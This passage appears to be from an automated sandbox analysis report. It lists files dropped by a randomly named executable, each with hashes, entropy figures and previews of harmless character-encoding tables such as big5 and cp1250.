                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:5c2VBUvEWVrVJ/eyN9j2iV2NdWWT0VbusV7EV7KVAMmVZyd851VFpsGkliX:5HVBUlJvRj7SOVbusZhAMiZyi77qsX
                                                                                                                                                                                                                              MD5:9E3A454FA480E9A99D2D5ACDAA775233
                                                                                                                                                                                                                              SHA1:493637BB570A5C96BB62F998BD0391FB59AFC5F0
                                                                                                                                                                                                                              SHA-256:FB87BF197F4F485B08EA81F7534BC07D9C3A538D022424BE11011A1FE3C413FD
                                                                                                                                                                                                                              SHA-512:EDFCB2BB6AB052D28D5CEBD08AD57F36D3A4CB83D557B1359B0ADE1266E24D8F3CE87B8240881396A5BA4FB45F8B74014784E8885CDB86680D98977CC0D130F0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: ascii, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E0000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):94389
                                                                                                                                                                                                                              Entropy (8bit):3.3217406555698195
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:UAHU3LIkZlmXrd/uQ0ao98zgKSTEvZPHb6qRL5NpiadDp0ZBFR6YR/fd:UVduBGf94gFMT6q95GDRBfd
                                                                                                                                                                                                                              MD5:41A874778111CC218BD421CF9C795EC2
                                                                                                                                                                                                                              SHA1:80857D106F71199CE187833D38DB091A819A520C
                                                                                                                                                                                                                              SHA-256:AD1ED201B69855BFD353BF969DFC55576DA35A963ABF1BF7FC6D8B5142A61A61
                                                                                                                                                                                                                              SHA-512:4244624124F86A3EFAB4C70B115A46C8ADF02D708860FA5F327CDBFA24BC3F9EFAD0C6EE58DE96B0B6BBC4CF6D99B322BB8657129007C86D6482F41C1503AAD4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: big5, multi-byte..M..003F 0 89..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..00000000000000000000000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):98634
                                                                                                                                                                                                                              Entropy (8bit):2.438904802083714
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:MPFOsOKqBLPf62X4lgQeLHj6RHUn0TQb8G47Ianrd28gr:MPAsknjX4OQe7aoMMarAFr
                                                                                                                                                                                                                              MD5:B6A7C59E6A48D91CC2DBCB2BBA7E4510
                                                                                                                                                                                                                              SHA1:16A9338F18202B26981F2028BEA412DD03BB0FF2
                                                                                                                                                                                                                              SHA-256:8924545CC92584169138AADB64683C07BBF846A57014C2E668D23B63F43F3610
                                                                                                                                                                                                                              SHA-512:3D644CF394A528A8699BE3679F787A4E1DAD657C04B810580A4C520F2C043471640FBE080AC46DFD3924C47A73BEE12A6AC69D291D09EB791AD0D64A73750B43
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cns11643, double-byte..D..2134 0 93..21..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..00004E284E364E3F4E854E054E04518251965338536953B64E2A4E874E4951E2..4E464E8F4EBC4EBE516651E35204529C53B95902590A5B805DDB5E7A5E7F5EF4..5F505F515F61961D4E3C4E634E624EA351854EC54ECF4ECE4ECC518451865722..572351E45205529E529D52FD5300533A5C735346535D538653B7620953CC6C15..53CE57216C3F5E005F0C623762386534653565E04F0E738D4E974EE04F144EF1..4EE74EF74EE64F1D4F024F054F2256D8518B518C519951E55213520B52A60000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..000000000000000000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1111
                                                                                                                                                                                                                              Entropy (8bit):3.3578844928761034
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:CqHVBUlJvRj7SOVbusZhAMiZyi77q8ujr4z8tjsuVO6ys2K:JMlBVnrAMiwMm8ujr4z8emTys2K
                                                                                                                                                                                                                              MD5:9568EDE60D3F917F1671F5A625A801C4
                                                                                                                                                                                                                              SHA1:4F5B3308FE7F6845B46779DECF9B395E47AC7396
                                                                                                                                                                                                                              SHA-256:E2991A6F7A7A4D8D3C4C97947298FD5BACB3EAA2F898CEE17F5E21A9861B9626
                                                                                                                                                                                                                              SHA-512:9C32BE3E25FC2211CE91F7B9AE1F9EBA20071272BE2BBBA63A8B6E3CD6543C4C32CD62C4C4D153C94F5BE212E974A61EEFD70DDC005F1688D09D9D56E8E298A8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp1250, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC0081201A0083201E2026202020210088203001602039015A0164017D0179..009020182019201C201D202220132014009821220161203A015B0165017E017A..00A002C702D8014100A4010400A600A700A800A9015E00AB00AC00AD00AE017B..00B000B102DB014200B400B500B600B700B80105015F00BB013D02DD013E017C..015400C100C2010200C40139010600C7010C00C9011800CB011A00CD00CE010E..01100143014700D300D4015000D600D70158016E00DA017000DC00DD016200DF..015500E100E2010300E40
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1111
                                                                                                                                                                                                                              Entropy (8bit):3.358948900439905
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:CTHVBUlJvRj7SOVbusZhAMiZyi77qpREwKsF/+++SAJlz9aRme3cJI:wMlBVnrAMiwMmpKwKm/EYnsJI
                                                                                                                                                                                                                              MD5:83DAF47FD1F87B7B1E9E086F14C39E5B
                                                                                                                                                                                                                              SHA1:77AE330512EBFEF430A02213644BD1CFCE174298
                                                                                                                                                                                                                              SHA-256:0AA66DFF8A7AE570FEE83A803F8F5391D9F0C9BD6311796592D9B6E8E36BE6FC
                                                                                                                                                                                                                              SHA-512:D7CE2F44EDFE1DA6D3E07E9A41BB08AD42430BAAFADD09FD217F4B524323A01A1F4913B640C552D38AAEBFF75B0D50ED7A813A2A57C4019311158890C0162DF9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp1251, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..04020403201A0453201E20262020202120AC203004092039040A040C040B040F..045220182019201C201D202220132014009821220459203A045A045C045B045F..00A0040E045E040800A4049000A600A7040100A9040400AB00AC00AD00AE0407..00B000B104060456049100B500B600B704512116045400BB0458040504550457..0410041104120413041404150416041704180419041A041B041C041D041E041F..0420042104220423042404250426042704280429042A042B042C042D042E042F..043004310432043304340
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1111
                                                                                                                                                                                                                              Entropy (8bit):3.292994562910468
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:C4HVBUlJvRj7SOVbusZhAMiZyi77qdmV/rcwvGNNlkL+rSMH+tKv:rMlBVnrAMiwMmd2r/okLz0
                                                                                                                                                                                                                              MD5:E9117326C06FEE02C478027CB625C7D8
                                                                                                                                                                                                                              SHA1:2ED4092D573289925A5B71625CF43CC82B901DAF
                                                                                                                                                                                                                              SHA-256:741859CF238C3A63BBB20EC6ED51E46451372BB221CFFF438297D261D0561C2E
                                                                                                                                                                                                                              SHA-512:D0A39BC41ADC32F2F20B1A0EBAD33BF48DFA6ED5CC1D8F92700CDD431DB6C794C09D9F08BB5709B394ACF54116C3A1E060E2ABCC6B503E1501F8364D3EEBCD52
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp1252, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC0081201A0192201E20262020202102C62030016020390152008D017D008F..009020182019201C201D20222013201402DC21220161203A0153009D017E0178..00A000A100A200A300A400A500A600A700A800A900AA00AB00AC00AD00AE00AF..00B000B100B200B300B400B500B600B700B800B900BA00BB00BC00BD00BE00BF..00C000C100C200C300C400C500C600C700C800C900CA00CB00CC00CD00CE00CF..00D000D100D200D300D400D500D600D700D800D900DA00DB00DC00DD00DE00DF..00E000E100E200E300E40
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1111
                                                                                                                                                                                                                              Entropy (8bit):3.422723556981327
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:CRHVBUlJvRj7SOVbusZhAMiZyi77qduWn4T5K9QQSqiWeIDDdn:CMlBVnrAMiwMmduWnSKyQSqiWeIVn
                                                                                                                                                                                                                              MD5:441B86A0DE77F25C91DF1CD4685F651D
                                                                                                                                                                                                                              SHA1:D1E429916BC9423F55EEC8F17941521E9FE9D32B
                                                                                                                                                                                                                              SHA-256:5B8D47451F847C1BDE12CACA3739CA29860553C0B6399EE990D51B26F9A69722
                                                                                                                                                                                                                              SHA-512:35DF342DDA4E8790C6D53762465DF8B93B49B7B7E211D7A5753078EF559C9C9383EFF7285A90FF5C0020FBB16AF380EE3C8643F4CEB1E41917E72021079D722F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp1253, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC0081201A0192201E20262020202100882030008A2039008C008D008E008F..009020182019201C201D20222013201400982122009A203A009C009D009E009F..00A00385038600A300A400A500A600A700A800A9000000AB00AC00AD00AE2015..00B000B100B200B3038400B500B600B703880389038A00BB038C00BD038E038F..0390039103920393039403950396039703980399039A039B039C039D039E039F..03A003A1000003A303A403A503A603A703A803A903AA03AB03AC03AD03AE03AF..03B003B103B203B303B40
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1111
                                                                                                                                                                                                                              Entropy (8bit):3.307590929679485
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:CWHVBUlJvRj7SOVbusZhAMiZyi77qdjrcFvGNNlkBSMH+tA/b:lMlBVnrAMiwMmdjriokgzAD
                                                                                                                                                                                                                              MD5:5FA9162BEC5A4DEA97B5EA2840CFB065
                                                                                                                                                                                                                              SHA1:F26858E3D2FB928F39CA87CBB8446AF099570CAD
                                                                                                                                                                                                                              SHA-256:31639CA96A4D3602D59BD012540FE179917E0561CB11A0D0B61F1B950EB76911
                                                                                                                                                                                                                              SHA-512:3CE7BEABBE1A0CB946149D263D3317A8B791F6D72C49DEC4621E27F50CC359D8FA3EE97C03FF05D44E47DAA59DB87F219386467614B8B3FF8CC21AB3E3BED5E6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp1254, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC0081201A0192201E20262020202102C62030016020390152008D008E008F..009020182019201C201D20222013201402DC21220161203A0153009D009E0178..00A000A100A200A300A400A500A600A700A800A900AA00AB00AC00AD00AE00AF..00B000B100B200B300B400B500B600B700B800B900BA00BB00BC00BD00BE00BF..00C000C100C200C300C400C500C600C700C800C900CA00CB00CC00CD00CE00CF..011E00D100D200D300D400D500D600D700D800D900DA00DB00DC0130015E00DF..00E000E100E200E300E40
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1111
                                                                                                                                                                                                                              Entropy (8bit):3.3385880810272774
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:CfHVBUlJvRj7SOVbusZhAMiZyi77qdIn2hEeGlRhv6Mw6Kcv:MMlBVnrAMiwMmdInSEdhvrj7
                                                                                                                                                                                                                              MD5:6DEA4179969D6C81C66C3B0F91B39769
                                                                                                                                                                                                                              SHA1:7E2722576BFFABC3258C5EDB2D99FA2468D6A4B0
                                                                                                                                                                                                                              SHA-256:47576CAE321C80E69C7F35205639680BF28010111E86E228ED191B084FAC6B91
                                                                                                                                                                                                                              SHA-512:91CC626B6454517F06FB3616E9ED623D1A2A4BFE74AFA9885F00F6AEC835D8825A5587091B9D9AB0E5ABDA291FA3FE7CE87E2618E21EB2974D9118AE27B8A2FF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp1255, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC0081201A0192201E20262020202102C62030008A2039008C008D008E008F..009020182019201C201D20222013201402DC2122009A203A009C009D009E009F..00A000A100A200A320AA00A500A600A700A800A900D700AB00AC00AD00AE00AF..00B000B100B200B300B400B500B600B700B800B900F700BB00BC00BD00BE00BF..05B005B105B205B305B405B505B605B705B805B9000005BB05BC05BD05BE05BF..05C005C105C205C305F005F105F205F305F40000000000000000000000000000..05D005D105D205D305D40
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1111
                                                                                                                                                                                                                              Entropy (8bit):3.4033510023542655
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:C0HVBUlJvRj7SOVbusZhAMiZyi77q30pPE7Lym4cwGm+AMZjyG/JQIG/Y:XMlBVnrAMiwMm30FQLym4ys6Jg/Y
                                                                                                                                                                                                                              MD5:D50DFAFEE5C605C5C00A25A9EEE4D4CF
                                                                                                                                                                                                                              SHA1:7D51BC17931D3D809716C06E7F07C6011286A144
                                                                                                                                                                                                                              SHA-256:29340EA8E5AD3532BF67FA77CC852F055081B1238925CB109908AA72804CCC04
                                                                                                                                                                                                                              SHA-512:D0A9B422A1061D6239E442767069B987E33239FCBA9BACE677923888F5F8BD1DCAABC71B83A985A0A86A15DCC44316781665BBFBF24558FCB94FDA6783285BCB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp1256, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC067E201A0192201E20262020202102C62030067920390152068606980688..06AF20182019201C201D20222013201406A921220691203A0153200C200D06BA..00A0060C00A200A300A400A500A600A700A800A906BE00AB00AC00AD00AE00AF..00B000B100B200B300B400B500B600B700B800B9061B00BB00BC00BD00BE061F..06C1062106220623062406250626062706280629062A062B062C062D062E062F..063006310632063306340635063600D7063706380639063A0640064106420643..00E0064400E2064506460
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1111
                                                                                                                                                                                                                              Entropy (8bit):3.344584404753015
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:CNHVBUlJvRj7SOVbusZhAMiZyi77q8uWTfNL4wIBUioGndt:uMlBVnrAMiwMm8uWJDNIt
                                                                                                                                                                                                                              MD5:CC3D24543FDD4644BBBD4AAB30CA71BC
                                                                                                                                                                                                                              SHA1:8E2658E7F782F005411BCB8423BDFC3C68BDED14
                                                                                                                                                                                                                              SHA-256:C15AB85438728BF2C60D72B1A66AF80E8B1CE3CF5EB08BA6421FF1B2F73ACDF4
                                                                                                                                                                                                                              SHA-512:5ECABF820098F7D24AB806ADD9CA3E1087C29914FB2DE6BA3DC656234202DE3FDF80A7E9ED433CCB2149FF07184F74884CEB37A1B689E9E0C1402916F3E13AFE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp1257, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC0081201A0083201E20262020202100882030008A2039008C00A802C700B8..009020182019201C201D20222013201400982122009A203A009C00AF02DB009F..00A0000000A200A300A4000000A600A700D800A9015600AB00AC00AD00AE00C6..00B000B100B200B300B400B500B600B700F800B9015700BB00BC00BD00BE00E6..0104012E0100010600C400C501180112010C00C90179011601220136012A013B..01600143014500D3014C00D500D600D701720141015A016A00DC017B017D00DF..0105012F0101010700E40
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1111
                                                                                                                                                                                                                              Entropy (8bit):3.2984943182702593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:CKlHVBUlJvRj7SOVbusZhAMiZyi77qdIQ2jFvGNNykoxWi3/i:xMlBVnrAMiwMmdIQufkoxn3q
                                                                                                                                                                                                                              MD5:12BCEAE6B6A5FAE5AE9C42F5998BA485
                                                                                                                                                                                                                              SHA1:C9620DA0C763D2C3770386E69EE7E421BD1BA965
                                                                                                                                                                                                                              SHA-256:29D93DEE7C01B2264778BC6B75F6EF76EA6AC53E9F4A334D83707229E7F482D2
                                                                                                                                                                                                                              SHA-512:714BAF58462FB0E84A32D82C8FC2D63EDF78DF8CCE578391E2521737F94F860B5CCFE41B481E1D09879A6811FCFD8B98A2724DB1D15749BD5293A9B33BCAD071
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp1258, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC0081201A0192201E20262020202102C62030008A20390152008D008E008F..009020182019201C201D20222013201402DC2122009A203A0153009D009E0178..00A000A100A200A300A400A500A600A700A800A900AA00AB00AC00AD00AE00AF..00B000B100B200B300B400B500B600B700B800B900BA00BB00BC00BD00BE00BF..00C000C100C2010200C400C500C600C700C800C900CA00CB030000CD00CE00CF..011000D1030900D300D401A000D600D700D800D900DA00DB00DC01AF030300DF..00E000E100E2010300E40
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1110
                                                                                                                                                                                                                              Entropy (8bit):3.515546664597914
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:CFyHVBUlJvRj7SOVbusZhAMiZyi77qZpuHVBIqE18wDyV8mK:wyMlBVnrAMiwMm+VhE1LmK
                                                                                                                                                                                                                              MD5:CE6D8A6542DC12D1783084FA4B2B63EA
                                                                                                                                                                                                                              SHA1:5039A350C8E3E2C6F353B438B41BD0B6A7AB8069
                                                                                                                                                                                                                              SHA-256:E5613C04D3D2EE44CCAD85AE53A37C257674491C540836E5D942BBCC4E4A8DB4
                                                                                                                                                                                                                              SHA-512:E8C5CFB747486BBE0E567B6E87B59D5246D749A80C8F64F6669227C7FD849886F98A1F94451922AC099409AC14890F1A8B1E5F25EA584FDB1522ACE3AD0BE6A6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp437, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C700FC00E900E200E400E000E500E700EA00EB00E800EF00EE00EC00C400C5..00C900E600C600F400F600F200FB00F900FF00D600DC00A200A300A520A70192..00E100ED00F300FA00F100D100AA00BA00BF231000AC00BD00BC00A100AB00BB..259125922593250225242561256225562555256325512557255D255C255B2510..25142534252C251C2500253C255E255F255A25542569256625602550256C2567..2568256425652559255825522553256B256A2518250C25882584258C25902580..03B100DF039303C003A303
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1110
                                                                                                                                                                                                                              Entropy (8bit):3.6177058818384693
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:CjHVBUlJvRj7SOVbusZhAMiZyi77qSKOQFhWehDrq18wDyVKockoiH:WMlBVnrAMiwMmSKOQFhWeh3q1odH
                                                                                                                                                                                                                              MD5:8EF3CBCA101F5777846D12D3C96A0A7D
                                                                                                                                                                                                                              SHA1:5EC5418B861894E0F18EA15AA4414019815E2EA2
                                                                                                                                                                                                                              SHA-256:A0415F14F5D72AD24E9C3A5C91517A0E3D22E1ADBC3505C0C6E918B961F7A07D
                                                                                                                                                                                                                              SHA-512:FB14C88E61E5459B4A8706751D88D0A261AC6B4171F72912D87CE78A2BC97A821CCF5B53676FB229C08F9E557BE624F4DC649B722A906B9B7944ED2D5E7F9065
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp737, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..039103920393039403950396039703980399039A039B039C039D039E039F03A0..03A103A303A403A503A603A703A803A903B103B203B303B403B503B603B703B8..03B903BA03BB03BC03BD03BE03BF03C003C103C303C203C403C503C603C703C8..259125922593250225242561256225562555256325512557255D255C255B2510..25142534252C251C2500253C255E255F255A25542569256625602550256C2567..2568256425652559255825522553256B256A2518250C25882584258C25902580..03C903AC03AD03AE03CA03
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1110
                                                                                                                                                                                                                              Entropy (8bit):3.451057608106102
                                                                                                                                                                                                                              Encrypted:false
